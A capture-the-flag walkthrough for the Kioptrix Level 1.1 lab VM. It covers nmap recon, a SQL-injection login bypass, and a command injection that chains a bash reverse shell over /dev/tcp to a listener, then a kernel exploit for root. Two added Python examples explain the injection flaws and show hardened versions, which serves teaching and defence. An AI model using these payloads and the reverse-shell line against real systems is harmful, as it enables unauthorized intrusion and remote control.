Kioptrix: Level 1.1 (#2)
[Complete Walkthrough]
Level 1.0 is also solved without Metasploit; if you want a look, check out the link: https://tinyurl.com/jmnyj9h3
The Kioptrix 2 VM can be downloaded here.
— — — — — — — — — — — — — — — — — — — —
#Getting VM’s IP
~# netdiscover -r 192.168.230.0/24
Recon started with a full TCP port scan and service detection (nmap -T4 -p- -A), saved to nmap/initials. The detailed nmap report is shown below:
# Nmap 7.91 scan initiated Sun Aug 22 14:24:41 2021 as: nmap -T4 -p- -A -oN nmap/initials 192.168.230.134
Nmap scan report for 192.168.230.134
Host is up (0.0019s latency).
Not shown: 65527 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1013/udp status
|_ 100024 1 1016/tcp status
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2021-08-22T15:15:29+00:00; -3h09m41s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
1016/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
4149/tcp filtered agslb

Host script results:
|_clock-skew: -3h09m41s
Plenty of ports are open. The scan already says a lot about the age of the box (SSHv1 and SSLv2 are enabled, the HTTPS certificate expired in 2010, Apache 2.0.52), but the two that catch the eye are 80 (web) and 3306 (MySQL). The web page on port 80 asks for credentials and I had none, so, with the MySQL port as a strong hint that a database sits behind the form, I tried basic SQL injection.
The page itself was static, but viewing its source revealed a coding error in the form, as shown.
Intercepting the login request with Burp and changing the submitted fields as shown got us past the login and onto the page behind it ;-))
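To make the login bypass concrete, here is an added example (not the Kioptrix page's own PHP, which the walkthrough does not reproduce). It builds the same kind of string-concatenated query a naive login form uses and shows why a tautology or a comment marker in the username field logs you in, next to the parameterized version that does not. An in-memory SQLite table stands in for the VM's MySQL database so it runs offline; the sample user row and the payloads are constructed here. MySQL behaves the same for these payloads and additionally accepts `#` as a comment marker.

```python
"""SQL-injection login bypass: vulnerable string-built query beside a parameterized one.

Added example; the Kioptrix login page's own PHP is not reproduced in the walkthrough.
An in-memory SQLite table stands in for the VM's MySQL database so this runs offline.
The payloads work the same on MySQL, which additionally accepts '#' as a comment marker.
"""
import sqlite3

# Constructed sample credentials; nothing from the real VM.
SAMPLE_USER, SAMPLE_PASS = "admin", "CorrectHorseBattery"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", (SAMPLE_USER, SAMPLE_PASS))
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    # The classic bug: user input is spliced into the SQL text, so quote
    # characters and operators in the input become part of the query's syntax.
    return ("SELECT username FROM users WHERE username='%s' AND password='%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    # Bound parameters: the driver sends the values separately from the SQL
    # text, so an input like  ' OR '1'='1  is compared literally as a string.
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Two basic bypass payloads. AND binds tighter than OR, so the first turns the
# WHERE clause into  username='' OR ('1'='1' AND password='') OR '1'='1'  which
# is always true. The second comments out the password check entirely.
TAUTOLOGY = "' OR '1'='1"
COMMENT_OUT = "admin' -- "


def demo():
    conn = make_db()
    return {
        "real_creds": login_vulnerable(conn, SAMPLE_USER, SAMPLE_PASS),
        "tautology_vuln": login_vulnerable(conn, TAUTOLOGY, TAUTOLOGY),
        "comment_vuln": login_vulnerable(conn, COMMENT_OUT, "wrong"),
        "tautology_safe": login_hardened(conn, TAUTOLOGY, TAUTOLOGY),
        "comment_safe": login_hardened(conn, COMMENT_OUT, "wrong"),
    }


if __name__ == "__main__":
    print(build_vulnerable_query(TAUTOLOGY, TAUTOLOGY))
    for name, result in demo().items():
        print(name, "->", result)
```

The vulnerable function returns the admin row for both payloads with no valid password; the hardened one returns nothing for either, because the bound value never reaches the SQL parser.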
I tried a netcat reverse shell first, but nothing came back: either the target is filtering it or nc is not available on the machine.
NOW WHAT????
With nc listening on port 4444 on my machine, I created the reverse shell by submitting my IP followed by a chained bash command:
192.168.230.128; bash -i >& /dev/tcp/192.168.230.128/4444 0>&1
We got a shell! Now look around and start enumerating the machine: distribution release, kernel version, and so on.
After enumeration I found a kernel exploit matching this machine, saved it under the filename shown, transferred it to the victim and ran it. The following image describes it all. Kernel exploits can crash the box, so take a VM snapshot before running one.
And now we are ROOT! That was all for this machine; I hope you found something useful.
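The payload above works because whatever the page does with the submitted IP, it hands it to a shell as part of a command string, and `;` ends that command and starts a second one. Here is an added example of that mechanism (not the VM's code; the walkthrough does not show the command the form runs, so `echo ping <host>` stands in for it). It tokenizes the walkthrough's own payload the way a POSIX shell would, runs the vulnerable pattern with a harmless constructed payload so it can be exercised offline, and shows the hardened version that validates the input as an IP and passes argv as a list so no shell parses it. The listener is assumed to be `nc -lvnp 4444` on the attacker host.

```python
"""Command injection behind the reverse-shell payload used in the walkthrough.

Added example, not the VM's code. The walkthrough does not show the command the
form runs on the submitted IP, so `echo ping <host>` stands in for it below; the
mechanism is the same: the input is pasted into a shell command line, and a ';'
ends one command and starts another.
"""
import ipaddress
import shlex
import subprocess

# Payload from the walkthrough: attacker IP first (so the intended command still
# gets a valid argument), then a bash reverse shell back to the listener
# (assumed: `nc -lvnp 4444` on 192.168.230.128). Not executed here.
REVERSE_SHELL = "192.168.230.128; bash -i >& /dev/tcp/192.168.230.128/4444 0>&1"

# Constructed harmless payload so the vulnerable path can be exercised offline.
BENIGN_PAYLOAD = "127.0.0.1; echo INJECTED"


def shell_tokens(host):
    """Tokenize the concatenated command line the way a POSIX shell would (no execution)."""
    lex = shlex.shlex("echo ping " + host, posix=True, punctuation_chars=True)
    return list(lex)


def run_vulnerable(host):
    # shell=True with string concatenation: the injected ';' splits the line
    # into two commands and the second runs with the web server's privileges.
    done = subprocess.run("echo ping " + host, shell=True,
                          capture_output=True, text=True)
    return done.stdout


def run_hardened(host):
    # Validate the input as an IP address, then pass argv as a list so no shell
    # ever parses it. Both layers matter: a list alone still lets an arbitrary
    # value reach the program as an argument.
    try:
        ipaddress.ip_address(host)
    except ValueError:
        raise ValueError("rejected: not an IP address: %r" % host)
    done = subprocess.run(["echo", "ping", host], capture_output=True, text=True)
    return done.stdout


if __name__ == "__main__":
    print(shell_tokens(REVERSE_SHELL))
    print(run_vulnerable(BENIGN_PAYLOAD), end="")
    try:
        run_hardened(BENIGN_PAYLOAD)
    except ValueError as err:
        print(err)
```

Tokenizing the real payload shows `;` as its own token immediately followed by `bash`, which is exactly what the target's shell saw; the benign payload makes the vulnerable function print a second line it was never meant to, while the hardened function refuses the input before any process starts.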
— — — — — — — — — — — — — — — — — -
May the knowledge I shared empower you.
That’s all for now
Until Next Time,
Stay Humble!!
— — — — — — — — — — -